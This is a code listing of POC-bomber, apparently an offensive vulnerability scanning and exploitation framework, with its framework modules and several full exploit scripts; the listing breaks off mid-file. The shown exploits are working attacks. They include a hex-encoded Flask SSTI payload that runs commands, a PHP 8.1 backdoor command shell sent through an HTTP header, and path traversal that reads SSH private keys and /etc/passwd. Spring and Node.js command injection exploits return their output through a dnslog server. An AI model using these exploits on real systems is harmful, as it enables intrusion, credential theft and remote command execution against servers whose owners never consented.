├── LICENSE ├── README.md ├── inc ├── common.py ├── config.py ├── console.py ├── dnslog.py ├── import_plugin.py ├── init.py ├── output.py ├── run.py └── thread.py ├── pocbomber.py ├── pocs ├── framework │ ├── flask │ │ └── flask_ssti.py │ ├── laravel │ │ ├── CVE_2017_16894.py │ │ └── CVE_2021_3129.py │ ├── nodejs │ │ ├── CVE_2017_14849.py │ │ └── CVE_2021_21315.py │ ├── php │ │ ├── php_81_backdoor.py │ │ ├── php_xdebug_rce.py │ │ └── phpinfo_inclusion.py │ ├── shiro │ │ └── shiro_defaultkey.py │ ├── spring │ │ ├── CVE_2018_1273.py │ │ ├── CVE_2021_21234.py │ │ ├── CVE_2022_22947.py │ │ ├── CVE_2022_22965.py │ │ ├── jolokia_logback_jndi_rce.py │ │ └── jolokia_realm_jndi_rce.py │ ├── struct2 │ │ ├── s2_001.py │ │ ├── s2_005.py │ │ ├── s2_007.py │ │ ├── s2_008.py │ │ ├── s2_009.py │ │ ├── s2_012.py │ │ ├── s2_013.py │ │ ├── s2_015.py │ │ ├── s2_016.py │ │ ├── s2_032.py │ │ ├── s2_045.py │ │ ├── s2_046.py │ │ ├── s2_048.py │ │ ├── s2_053.py │ │ ├── s2_057.py │ │ └── s2_061.py │ └── thinkphp │ │ ├── thinkphp2_rce.py │ │ ├── thinkphp32x_rce.py │ │ ├── thinkphp5022_5129.py │ │ ├── thinkphp5023_rce.py │ │ ├── thinkphp5_sqli.py │ │ ├── thinkphp_driver_display_rce.py │ │ ├── thinkphp_index_construct_rce.py │ │ ├── thinkphp_index_showid_rce.py │ │ ├── thinkphp_invoke_func_code_exec.py │ │ ├── thinkphp_lite_code_exec.py │ │ ├── thinkphp_method_filter_code_exec.py │ │ ├── thinkphp_multi_sql_leak.py │ │ ├── thinkphp_pay_orderid_sqli.py │ │ ├── thinkphp_request_input_rce.py │ │ └── thinkphp_view_recent_xff_sqli.py ├── middleware │ ├── apache │ │ ├── CVE_2017_15715.py │ │ ├── CVE_2021_36749.py │ │ ├── CVE_2021_41773.py │ │ ├── CVE_2021_42013.py │ │ └── log4j2_rce.py │ ├── jboss │ │ ├── CVE_2017_12149.py │ │ ├── CVE_2017_7501.py │ │ └── CVE_2017_7504.py │ ├── nginx │ │ └── nginx_parsing_vulnerability.py │ ├── tomcat │ │ ├── CVE_2017_12615.py │ │ ├── tomcat.war │ │ └── tomcat_weakpass_getshell.py │ └── weblogic │ │ ├── CVE_2014_4210.py │ │ ├── CVE_2016_0638.py │ │ ├── CVE_2016_3510.py │ │ ├── CVE_2017_10271.py │ │ ├── CVE_2017_3248.py │ │ ├── CVE_2017_3506.py │ │ ├── CVE_2018_2628.py │ │ ├── CVE_2018_2893.py │ │ ├── CVE_2018_2894.py │ │ ├── CVE_2019_2725.py │ │ ├── CVE_2019_2729.py │ │ ├── CVE_2019_2890.py │ │ ├── CVE_2020_14882.py │ │ └── CVE_2020_2551.py ├── ports │ ├── memcache_unauth_11211.py │ ├── redis_6379.py │ ├── rsync_unauth_873.py │ ├── sunlogin_rce.py │ └── zookeeper_unauthorized.py ├── redteam │ ├── fanwei_e-cology_uploadOperation_fileupload_2022.py │ ├── fanwei_e-cology_verifyquicklogin_loginbypass_2022.py │ ├── h3c_cvm_fileupload_2022.py │ ├── huatiandongli_oa_fileupload_2022.py │ ├── landray_oa_admindo_jndiinject_2021.py │ ├── landray_oa_treexml_rce_2022.py │ ├── lvmeng_nsfocus_nf_fileupload_2022.py │ ├── mingyu_fileread_2022.py │ ├── prtg_default_pwd_rce.py │ ├── ruijie_nbr_fileupload.py │ ├── seeyon_oa_ajaxdo_fileupload_2022.py │ ├── seeyon_oa_wpsassistservlet_fileupload_2022.py │ ├── tongda_oa_2016_fileupload.py │ ├── tongda_oa_fileinclude_2020.py │ ├── tongda_oa_qyapp-vote-submit_sqli.py │ ├── tongda_oa_v11-8_apialiphp_fileupload.py │ ├── topsec_management_rce_2022.py │ ├── wangkang_firewall_rce_2021.py │ ├── wanhu_oa_fileupload-controller_fileupload_2022.py │ ├── wanhu_oa_smartupload_fileupload.py │ ├── yongyou_chanjet_login_sqli.py │ ├── yongyou_grp-u8_proxy_xxe-sqli_2022.py │ ├── yongyou_grp-u8_uploadfiledata_fileupload_2022.py │ ├── yongyou_nc_file-receive-servlet_fileupload_2021.py │ ├── yongyou_nc_fileupload_2022.py │ ├── yongyou_nc_rce_2022.py │ ├── yongyou_ufida_ksoa_fileupload_2022.py │ └── zentao_cnvd-2022-42853_sqli.py └── web │ ├── CVE_2021_22205.py │ ├── CVE_2021_40870.py │ ├── atlassian │ └── CVE_2022_26134.py │ ├── dahua │ └── CVE_2021_33044.py │ ├── discuz │ └── discuz67x_rce.py │ ├── f5 │ └── CVE_2022_1388.py │ ├── fanruan │ └── fanruan_oa_v9_fileupload.py │ ├── h2database │ └── h2console_unauth.py │ ├── h3c │ └── h3c_imc_rce.py │ ├── hikvision │ ├── CVE_2017_7921.py │ └── CVE_2021_36260.py │ ├── jenkins │ └── CVE_2018_1000861.py │ ├── landray │ └── landray_oa_custom_jsp_fileread.py │ ├── seeyon │ ├── seeyon_a6_sqli.py │ ├── seeyon_get_sessionslist.py │ ├── seeyon_oa_a8_htmlofficeservlet_getshell.py │ └── seeyon_thirdpartycontroller_getshell.py │ ├── tongda │ ├── tongda_oa_fake_user.py │ ├── tongda_sqli_getdata_php.py │ └── tongda_videofile_fileread.py │ ├── ueditor_1433_parsing_vulnerabilitly.py │ ├── vmware │ ├── CVE_2021_21972.py │ └── CVE_2022_22954.py │ ├── weaver │ ├── CNVD_2019_32204.py │ ├── CNVD_2019_34241.py │ ├── CNVD_2021_49104.py │ ├── TestFile_weaver_common_ctrl_upload.zip │ ├── e_cology_v8_sqli.py │ ├── e_cology_workflowservicexml_rce.py │ ├── weaver_common_ctrl_upload.py │ └── weaver_ecology_getsqldata_sqli.py │ ├── wordpress │ └── CVE_2018_7422.py │ ├── yongyou │ └── yongyou_nc-find-web_fileread.py │ └── zabbix │ └── CVE_2022_23131.py ├── requirements.txt └── 更新日志.txt /inc/config.py: -------------------------------------------------------------------------------- 1 | # POC bomber config 2 | 3 | # 进度显示(默认开启) 4 | show_progress = True 5 | # 输出文件(默认为空) 6 | output_path = r'' 7 | 8 | # 线程池最大数量 9 | max_threads = 30 10 | # 单条poc最大超时 11 | timeout = 15 12 | # 休眠间隔(默认不休眠,如开启线程默认1) 13 | delay = 0 14 | 15 | 16 | ## Dnslog 配置(需要在vps上启动poc-bomber的dnslog服务端) 17 | # 自己购买域名设置的ns记录(对应a记录指向vps) 18 | dnslog_base_domain = "" 19 | # dnslog是否需要认证 20 | dnslog_is_auth = True 21 | # 如需认证,在此配置密码 22 | dnslog_auth_token = "123456" 23 | # dnslog http服务端口 24 | dnslog_web_port = 5000 25 | # dnslog服务端ip 26 | dnslog_server_ip = "" 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /inc/console.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | from inc import init 4 | from inc import run, output, common, dnslog 5 | import sys 6 | 7 | def pocbomber_console(): 8 | """控制台""" 9 | if common.get_value("dnslog_flag") and not common.get_value("target_list"): 10 | dnslog.dnslog_server() 11 | sys.exit() 12 | if common.get_value("dnslog_flag") and common.get_value("target_list"): 13 | dnslog.start_dnslog_scan() 14 | if common.get_value("delay"): 15 | common.set_value("max_threads", 1) 16 | if common.get_value("show"): 17 | output.show(common.get_value("script_list")) 18 | sys.exit() 19 | if not common.get_value("target_list"): 20 | output.usage() 21 | sys.exit() 22 | 23 | print('\n[*] starting {0}\n'.format(output.get_time1())) 24 | output.start_output() 25 | target_list = common.get_value("target_list") 26 | script_list = common.get_value("script_list") 27 | output.log_info('检测到 {0} 个目标, 已加载 {1} 条POC'.format(len(target_list), len(script_list))) 28 | run.verify(target_list, script_list) 29 | output.close_output() 30 | if common.get_value('attack'): 31 | output.log_info('检测到--attack参数, 开始尝试调用exp') 32 | if run.attack(target_list[0], script_list[0]): 33 | output.log_success('ATTACK END! enjoy : ) ') 34 | else: 35 | output.log_error('ATTACK FAIL! What\'s wrong?') 36 | 37 | print('\n[+] ending {0}\n'.format(output.get_time1())) 38 | 39 | -------------------------------------------------------------------------------- /inc/import_plugin.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tr0uble-mAker/POC-bomber/d2433ac41eaa58eb4fb0876ec05e3b645e10ecd7/inc/import_plugin.py -------------------------------------------------------------------------------- /inc/init.py: -------------------------------------------------------------------------------- 1 | from inc import common, config, output 2 | import platform, queue 3 | 4 | def init_all(): 5 | output.logo() 6 | args = common.get_parser() 7 | common._init() 8 | poc_path, poc_list = common.do_path(args.poc) 9 | common.set_value("tr0uble_mAker", True) 10 | common.set_value("os", "windows" if "Windows" in platform.system() else "linux") 11 | common.set_value("show_progress", True if config.show_progress else False) 12 | common.set_value("show", True if args.show else False) # --show 13 | common.set_value("output_path", args.output if args.output else config.output_path) # --output 14 | common.set_value("max_threads", args.threads if args.threads else config.max_threads) # --threads 15 | common.set_value("timeout", args.timeout if args.timeout else config.timeout) # --timeout 16 | common.set_value("delay", args.delay if args.delay else config.delay) # --delay 17 | common.set_value('dnslog_flag', True if args.dnslog else False) # --dnslog 18 | common.set_value('attack', True if args.attack else False) # --attack 19 | common.set_value("target_list", [args.url] if args.url else common.get_target_list(args.file)) # --url,--file 20 | common.set_value("pocinfo_dict", common.get_pocinfo_dict()) 21 | common.set_value("script_list", common.get_poc_scriptname_list_by_search(poc_path, poc_list)) 22 | common.set_value("total_times", len(common.get_value("target_list"))*len(common.get_value("script_list"))) 23 | common.set_value("current_times", 0) 24 | common.set_value("success_times", 0) 25 | common.set_value("output_queue", queue.Queue()) 26 | common.set_value("exit_queue", queue.Queue()) 27 | common.set_value("success_list", []) 28 | '''dnslog参数''' 29 | common.set_value("dnslog_base_domain", config.dnslog_base_domain) 30 | common.set_value("dnslog_is_auth", config.dnslog_is_auth) 31 | common.set_value("dnslog_auth_token", config.dnslog_auth_token) 32 | common.set_value("dnslog_web_port", config.dnslog_web_port) 33 | common.set_value("dnslog_server_ip", config.dnslog_server_ip) 34 | common.set_value("dnslog_scan_dict", {}) 35 | 36 | if not common.get_value("tr0uble_mAker"): 37 | init_all() -------------------------------------------------------------------------------- /inc/run.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | from inc import init 4 | from inc import thread, common 5 | # 禁用https报错 6 | from urllib3.exceptions import InsecureRequestWarning 7 | from urllib3 import disable_warnings 8 | disable_warnings(InsecureRequestWarning) 9 | 10 | 11 | def verify(target_list, script_list): 12 | thread_pool = thread.ThreadPool() 13 | for current_target in target_list: 14 | [thread_pool.add_task(current_target, script) for script in script_list] # 向线程池中添加所有poc和当前的url 15 | thread_pool.start_threadpool() 16 | 17 | def attack(target, script): 18 | try: 19 | if common.get_value("pocinfo_dict")[script].attack(target): 20 | return True 21 | return False 22 | except: 23 | return False 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /inc/thread.py: -------------------------------------------------------------------------------- 1 | from inc import init 2 | from inc import common 3 | from inc import output, dnslog 4 | import queue, time, threading 5 | import concurrent.futures 6 | from func_timeout import func_set_timeout 7 | 8 | class ThreadPool(): 9 | '''线城池模块''' 10 | def __init__(self): 11 | self.max_thread = common.get_value('max_threads') 12 | self.thread_pool = concurrent.futures.ThreadPoolExecutor(max_workers=self.max_thread) 13 | self.task_queue = queue.Queue() 14 | self.futures = {} 15 | 16 | def add_task(self, func, target): 17 | new_task = (func, target) 18 | self.task_queue.put(new_task) 19 | 20 | def start_threadpool(self): 21 | while self.task_queue.qsize() != 0: 22 | current_target, current_script = self.task_queue.get() 23 | future = self.thread_pool.submit(self.run_signel_poc, current_target, current_script) 24 | self.futures[future] = (current_target, current_script) 25 | if common.get_value("delay"): 26 | self.do_result(future.result()) 27 | time.sleep(common.get_value("delay")) 28 | if not common.get_value("delay"): 29 | for future in concurrent.futures.as_completed(self.futures): 30 | self.do_result(future.result()) 31 | self.thread_pool.shutdown() 32 | 33 | @func_set_timeout(common.get_value('timeout')) 34 | def set_fuc_timeout(self, func, arg): 35 | '''设置函数超时''' 36 | result = func(arg) 37 | return result 38 | 39 | def run_signel_poc(self, current_target, current_script): 40 | try: 41 | result = self.set_fuc_timeout(common.get_value("pocinfo_dict")[current_script].verify, current_target) 42 | result["url"] = current_target 43 | result["script"] = current_script 44 | return result 45 | except: 46 | # 超时 47 | result = { 48 | "url": current_target, 49 | "script": current_script, 50 | "timeout": True, 51 | } 52 | return result 53 | 54 | def do_result(self, result): 55 | if result.get("dnslog_domain"): 56 | dnslog.dnslog_add_scan(result) 57 | else: 58 | output.put_output_queue(result) 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /pocbomber.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | ############################ 4 | # Author tr0uble_mAker # 5 | ########################### 6 | 7 | from inc import console 8 | 9 | def main(): 10 | 11 | console.pocbomber_console() 12 | 13 | if __name__ == '__main__': 14 | main() 15 | 16 | 17 | 18 | -------------------------------------------------------------------------------- /pocs/framework/flask/flask_ssti.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | import random 5 | from urllib import parse 6 | 7 | def verify(url): 8 | relsult = { 9 | 'name': 'Flask-ssti 代码执行漏洞', 10 | 'vulnerable': False, 11 | 'attack': True, 12 | } 13 | try: 14 | rand_num1 = random.randint(1000, 9999) 15 | rand_num2 = random.randint(1000, 9999) 16 | payload = r'/?name={{%d*%d}}' % (rand_num1, rand_num2) 17 | rand_product = rand_num1 * rand_num2 18 | headers = { 19 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 20 | } 21 | vurl = urllib.parse.urljoin(url, payload) 22 | req = requests.get(vurl, headers=headers, timeout=3) 23 | if re.search(str(rand_product), req.text): 24 | relsult['vulnerable'] = True 25 | relsult['method'] = 'GET' 26 | relsult['url'] = url 27 | relsult['payload'] = vurl 28 | relsult['about'] = 'https://blog.csdn.net/yukinorong/article/details/106938717' 29 | return relsult 30 | except: 31 | return relsult 32 | 33 | 34 | def attack(url): 35 | try: 36 | cmd = '' 37 | base_payload = '?name=%7b%25%20%66%6f%72%20%63%20%69%6e%20%5b%5d%2e%5f%5f%63%6c%61%73%73%5f%5f%2e%5f%5f%62%61%73%65%5f%5f%2e%5f%5f%73%75%62%63%6c%61%73%73%65%73%5f%5f%28%29%20%25%7d%0d%0a%7b%25%20%69%66%20%63%2e%5f%5f%6e%61%6d%65%5f%5f%20%3d%3d%20%27%63%61%74%63%68%5f%77%61%72%6e%69%6e%67%73%27%20%25%7d%0d%0a%20%20%7b%25%20%66%6f%72%20%62%20%69%6e%20%63%2e%5f%5f%69%6e%69%74%5f%5f%2e%5f%5f%67%6c%6f%62%61%6c%73%5f%5f%2e%76%61%6c%75%65%73%28%29%20%25%7d%0d%0a%20%20%7b%25%20%69%66%20%62%2e%5f%5f%63%6c%61%73%73%5f%5f%20%3d%3d%20%7b%7d%2e%5f%5f%63%6c%61%73%73%5f%5f%20%25%7d%0d%0a%20%20%20%20%7b%25%20%69%66%20%27%65%76%61%6c%27%20%69%6e%20%62%2e%6b%65%79%73%28%29%20%25%7d%0d%0a%20%20%20%20%20%20%7b%7b%20%62%5b%27%65%76%61%6c%27%5d%28%27%5f%5f%69%6d%70%6f%72%74%5f%5f%28%22%6f%73%22%29%2e%70%6f%70%65%6e%28%22{0}%22%29%2e%72%65%61%64%28%29%27%29%20%7d%7d%0d%0a%20%20%20%20%7b%25%20%65%6e%64%69%66%20%25%7d%0d%0a%20%20%7b%25%20%65%6e%64%69%66%20%25%7d%0d%0a%20%20%7b%25%20%65%6e%64%66%6f%72%20%25%7d%0d%0a%7b%25%20%65%6e%64%69%66%20%25%7d%0d%0a%7b%25%20%65%6e%64%66%6f%72%20%25%7d' 38 | print('[+] 开始执行命令,输出exit退出!') 39 | while cmd != 'exit': 40 | cmd = input('[+] 执行命令 >') 41 | cmd = parse.quote(cmd) 42 | payload = base_payload.format(cmd) 43 | vurl = urllib.parse.urljoin(url, payload) 44 | rep1 = requests.get(urllib.parse.urljoin(url, '?name='), timeout=3) 45 | rep2 = requests.get(vurl, timeout=3) 46 | re1 = re.findall('[\S]*', rep1.text) 47 | re2 = re.findall('[\S]*', rep2.text) 48 | for output in re2: 49 | if output != '' and output not in re1: 50 | print(output) 51 | return True 52 | except: 53 | return False 54 | -------------------------------------------------------------------------------- /pocs/framework/laravel/CVE_2017_16894.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': 'Laravel DEBUG 敏感数据泄露(CVE-2017-16894)', 7 | 'vulnerable': False, 8 | 'attack': False, 9 | 'url': url, 10 | } 11 | timeout = 3 12 | headers = { 13 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) ", 14 | 'Content-Type': 'application/x-www-form-urlencoded', 15 | } 16 | payload = '/.env' 17 | vurl = urllib.parse.urljoin(url, payload) 18 | try: 19 | rep1 = requests.get(vurl, headers=headers, timeout=timeout, verify=False) 20 | if re.search("APP_NAME=Laravel", rep1.text): 21 | rep2 = requests.get(url, headers=headers, timeout=timeout, verify=False) 22 | if re.search("APP_NAME=Laravel", rep2.text) is not True: 23 | relsult['vulnerable'] = True 24 | relsult['verify'] = vurl 25 | return relsult 26 | except: 27 | return relsult -------------------------------------------------------------------------------- /pocs/framework/nodejs/CVE_2017_14849.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | from urllib import request 5 | import time 6 | 7 | def verify(url): 8 | relsult = { 9 | 'name': 'Node.js 目录穿越漏洞(CVE-2017-14849)', 10 | 'vulnerable': False, 11 | 'attack': True, 12 | } 13 | 14 | try: 15 | if url[-1] == '/': 16 | url = url.rstrip('/') 17 | base_payload = "/static/../../../a/../../../../{0}" 18 | vurl1 = url + base_payload.format('etc/passwd') 19 | vurl2 = url + base_payload.format('etc/hosts') 20 | rep1 = request.urlopen(vurl1, timeout=3) 21 | rep2 = request.urlopen(vurl2, timeout=3) 22 | rep1_txt = rep1.read().decode('utf-8') 23 | rep2_txt = rep2.read().decode('utf-8') 24 | if re.search("root:x:", rep1_txt) and re.search("localhost", rep2_txt): 25 | relsult['vulnerable'] = True 26 | relsult['url'] = url 27 | relsult['payload'] = vurl1 28 | relsult['about'] = 'https://www.cnblogs.com/r00tuser/p/7805005.html' 29 | return relsult 30 | else: 31 | return relsult 32 | except: 33 | return relsult 34 | 35 | 36 | def attack(url): 37 | if url[-1] == '/': 38 | url = url.rstrip('/') 39 | base_payload = "/static/../../../a/../../../..{0}" 40 | lists = [ 41 | "/etc/passwd", 42 | "/etc/group", 43 | "/etc/hosts", 44 | "/etc/motd", 45 | "/etc/issue", 46 | "/etc/bashrc", 47 | "/etc/apache2/apache2.conf", 48 | "/etc/apache2/ports.conf", 49 | "/etc/apache2/sites-available/default", 50 | "/etc/httpd/conf/httpd.conf", 51 | "/etc/httpd/conf.d", 52 | "/etc/httpd/logs/access.log", 53 | "/etc/httpd/logs/access_log", 54 | "/etc/httpd/logs/error.log", 55 | "/etc/httpd/logs/error_log", 56 | "/etc/init.d/apache2", 57 | "/etc/mysql/my.cnf", 58 | "/etc/nginx.conf", 59 | "/opt/lampp/logs/access_log", 60 | "/opt/lampp/logs/error_log", 61 | "/opt/lamp/log/access_log", 62 | "/opt/lamp/logs/error_log", 63 | "/proc/self/environ", 64 | "/proc/version", 65 | "/proc/cmdline", 66 | "/proc/mounts", 67 | "/proc/config.gz", 68 | "/root/.bashrc", 69 | "/root/.bash_history", 70 | "/root/.ssh/authorized_keys", 71 | "/root/.ssh/id_rsa", 72 | "/root/.ssh/id_rsa.keystore", 73 | "/root/.ssh/id_rsa.pub", 74 | "/root/.ssh/known_hosts", 75 | ] 76 | try: 77 | for file in lists: 78 | try: 79 | print('[*] 尝试读取文件: {0} ......'.format(file)) 80 | vurl = url + base_payload.format(file) 81 | rep = request.urlopen(vurl, timeout=5) 82 | print(rep.read().decode('utf-8')) 83 | except: 84 | print('[-] {0} 读取失败'.format(file)) 85 | return True 86 | except: 87 | return False 88 | 89 | -------------------------------------------------------------------------------- /pocs/framework/nodejs/CVE_2021_21315.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | import inc.dnslog 5 | from urllib import parse 6 | 7 | def verify(url): 8 | relsult = { 9 | 'name': 'Node.js命令注入漏洞(CVE-2021-21315)', 10 | 'vulnerable': False, 11 | 'attack': True, 12 | } 13 | try: 14 | cmd = 'whoami' 15 | payload = '/api/getServices?name[]=%24({0})'.format(cmd) 16 | headers = { 17 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 18 | } 19 | vurl = urllib.parse.urljoin(url, payload) 20 | req = requests.get(vurl, headers=headers, timeout=3) 21 | if re.search(cmd, req.text) and req.status_code == 200 and re.search('pcpu', req.text) and re.search('pmem', req.text): 22 | relsult['vulnerable'] = True 23 | relsult['method'] = 'GET' 24 | relsult['url'] = url 25 | relsult['payload'] = vurl 26 | relsult['about'] = 'https://blog.csdn.net/xuandao_ahfengren/article/details/115549714' 27 | return relsult 28 | except: 29 | return relsult 30 | 31 | 32 | def attack(url): 33 | try: 34 | dnslog = inc.dnslog.Dnslog() 35 | dnslog_domain = dnslog.dnslog_getdomain() 36 | if dnslog_domain: 37 | print('[+] 检测到--dnslog参数, 尝试验证漏洞......') 38 | cmd_rex = '([^.]+).{0}'.format(dnslog_domain) 39 | print('[+] 获取到dnslog随机域名: ', dnslog_domain) 40 | cmd = '' 41 | base_payload = '/api/getServices?name[]=%24(ping `{0}`.' + dnslog_domain + ')' 42 | headers = { 43 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0', 44 | } 45 | cmd = input('[+] 执行命令 >') 46 | payload = base_payload.format(cmd) 47 | vurl = urllib.parse.urljoin(url, payload) 48 | try: 49 | requests.get(vurl, headers=headers, timeout=1) 50 | except: 51 | pass 52 | print('[+] 正在结合dnslog获取执行命令结果......') 53 | dnslog.dnslog_sleep() 54 | dnslog_rep_str = dnslog.dnslog_getrep() 55 | try: 56 | output = re.findall(cmd_rex, dnslog_rep_str)[0] 57 | print('[*] 成功获取到执行结果:', output) 58 | except: 59 | print('[-] 未获取到执行结果, 请手工验证命令是否执行成功?') 60 | return False 61 | return True 62 | else: 63 | print('[-] 需要结合dnslog平台进行验证,请追加 --dnslog 参数来运行此exp!!!') 64 | return False 65 | except: 66 | return False 67 | -------------------------------------------------------------------------------- /pocs/framework/php/php_81_backdoor.py: -------------------------------------------------------------------------------- 1 | import requests, re 2 | import urllib 3 | 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'PHP 8.1.0-dev 开发版本后门', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | } 11 | headers = { 12 | 'Accept-Encoding': 'gzip, deflate', 13 | 'Accept': '*/*', 14 | 'Accept-Language': 'en', 15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36', 16 | 'User-Agentt': 'zerodiumvar_dump(233*233);', 17 | 'Connection': 'close', 18 | } 19 | try: 20 | rep = requests.get(url, headers=headers, timeout=3) 21 | if re.search('int\(54289\)', rep.text): 22 | relsult['vulnerable'] = True 23 | relsult['url'] = url 24 | relsult['method'] = 'GET' 25 | relsult['payload'] = headers['User-Agentt'] 26 | relsult['about'] = 'https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md' 27 | relsult['attack'] = True 28 | return relsult 29 | except: 30 | return relsult 31 | 32 | def attack(url): 33 | try: 34 | headers = { 35 | 'Accept-Encoding': 'gzip, deflate', 36 | 'Accept': '*/*', 37 | 'Accept-Language': 'en', 38 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36', 39 | 'User-Agentt': '', 40 | 'Connection': 'close', 41 | } 42 | base_payload = 'zerodiumsystem("{0}");' 43 | cmd = '' 44 | while cmd != 'exit': 45 | vul_headers = headers 46 | cmd = input('[+] 执行命令:') 47 | payload = base_payload.format(cmd) 48 | headers['User-Agentt'] = payload 49 | rep = requests.get(url, headers=vul_headers, timeout=3) 50 | print(rep.text) 51 | return True 52 | except: 53 | return False -------------------------------------------------------------------------------- /pocs/framework/shiro/shiro_defaultkey.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | def verify(url): 4 | relsult = { 5 | 'name': 'Shiro 默认密钥', 6 | 'vulnerable': False, 7 | 'attack': False, 8 | } 9 | headers = { 10 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)', 11 | } 12 | payload_dict = { 13 | "kPH+bIxk5D2deZiIxcaaaA==": "3vakOJDcITulYawMdd4UijbPyPpv8wZkOZ7Yt0wBjT4GCmUbx1yXymqb1BLnkvBmJlQ/AWSKtysv9yV4IwHA2sr41OgrkhFABXpf3OJd8xei5RUuTMJVEVklCQuZD/diciR0hSKqwlw0vJ40XU41Osv2wsVVIurD7FoGziYufa74Jbo1VW7oWtWVNyaRLVyA", 14 | } 15 | if check_shiro(url): 16 | for key in payload_dict.keys(): 17 | payload = payload_dict[key] 18 | cookies = {'rememberMe': payload} 19 | try: 20 | r = requests.get(url, headers=headers, cookies=cookies, timeout=3, verify=False, stream=True, allow_redirects=False) 21 | if 'rememberMe=deleteMe' not in str(r.headers): 22 | relsult['vulnerable'] = True 23 | relsult['url'] = url 24 | relsult['key'] = key 25 | relsult['about'] = 'https://github.com/feihong-cs/ShiroExploit' 26 | return relsult 27 | except: 28 | continue 29 | return relsult 30 | else: 31 | return relsult 32 | 33 | def check_shiro(url): 34 | headers = { 35 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)', 36 | } 37 | cookies = {'rememberMe': "123"} 38 | try: 39 | res = requests.get(url, verify=False, headers=headers, cookies=cookies, timeout=3) 40 | if 'rememberMe=deleteMe' in str(res.headers): 41 | return True 42 | else: 43 | return False 44 | except: 45 | return False 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /pocs/framework/spring/CVE_2018_1273.py: -------------------------------------------------------------------------------- 1 | import requests, urllib 2 | import re 3 | import inc.dnslog 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'spring 代码执行(CVE-2018-1273)', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | } 11 | headers = { 12 | "Content-type": "application/x-www-form-urlencoded" 13 | } 14 | try: 15 | rep = requests.get(url, timeout=3) 16 | if re.search('timestamp', rep.text) and re.search('status', rep.text) and rep.status_code == 404: 17 | vurl = urllib.parse.urljoin(url, '/users') 18 | 19 | payload = '''username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("whoami")]''' 20 | payload2 = '''username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("aaaaaa")]''' 21 | rep1 = requests.post(vurl, headers=headers, data=payload, timeout=3) 22 | rep2 = requests.post(vurl, headers=headers, data=payload2, timeout=3) 23 | if rep1.status_code == rep2.status_code == 500 and re.search('Invalid property', rep1.text) and re.search('A problem occurred', rep2.text): 24 | relsult['vulnerable'] = True 25 | relsult['url'] = url 26 | relsult['about'] = 'https://www.cnblogs.com/cute-puli/p/15338017.html' 27 | return relsult 28 | except: 29 | return relsult 30 | 31 | 32 | def attack(url): 33 | try: 34 | dnslog = inc.dnslog.Dnslog() 35 | dnslog_domain = dnslog.dnslog_getdomain() 36 | if dnslog_domain: 37 | print('[+] 获取到dnslog域名 {0}'.format(dnslog_domain)) 38 | headers = { 39 | "Content-type": "application/x-www-form-urlencoded" 40 | } 41 | vurl = urllib.parse.urljoin(url, '/users') 42 | cmd = 'ping {0}'.format(dnslog_domain) 43 | payload = '''username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("%s")]''' 44 | try: 45 | rep = requests.post(vurl, headers=headers, data=payload % cmd, timeout=5) 46 | except: 47 | pass 48 | print('[+] 尝试执行命令: {0}'.format(cmd)) 49 | print('[+] 等待检测回显 .........') 50 | dnslog.dnslog_sleep() 51 | dnslog_rep = dnslog.dnslog_getrep() 52 | if re.search(dnslog_domain, dnslog_rep): 53 | print('[+] 检测到回显,目标存在漏洞-CVE-2018-1273!') 54 | print('[*] 开始执行无回显命令,输入exit退出!') 55 | while cmd != 'exit': 56 | cmd = input('[+] 执行命令(无回显)>') 57 | rep = requests.post(vurl, headers=headers, data=payload % cmd, timeout=5) 58 | print('[+] 命令执行成功请手动用dnslog或vps检查!') 59 | else: 60 | print('[-] 未检测到回显,目标可能不出网或等待时间过短') 61 | return True 62 | else: 63 | print('[-] 该exp将调用dnslog进行检测,请追加 --dnslog 参数!') 64 | return False 65 | except: 66 | return False 67 | 68 | if __name__ == '__main__': 69 | print(verify('http://vulfocus.fofa.so:55508/')) -------------------------------------------------------------------------------- /pocs/framework/spring/CVE_2021_21234.py: -------------------------------------------------------------------------------- 1 | import requests, re 2 | import urllib 3 | 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'Spring Boot 目录遍历 (CVE-2021-21234)', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | } 11 | try: 12 | payload1 = 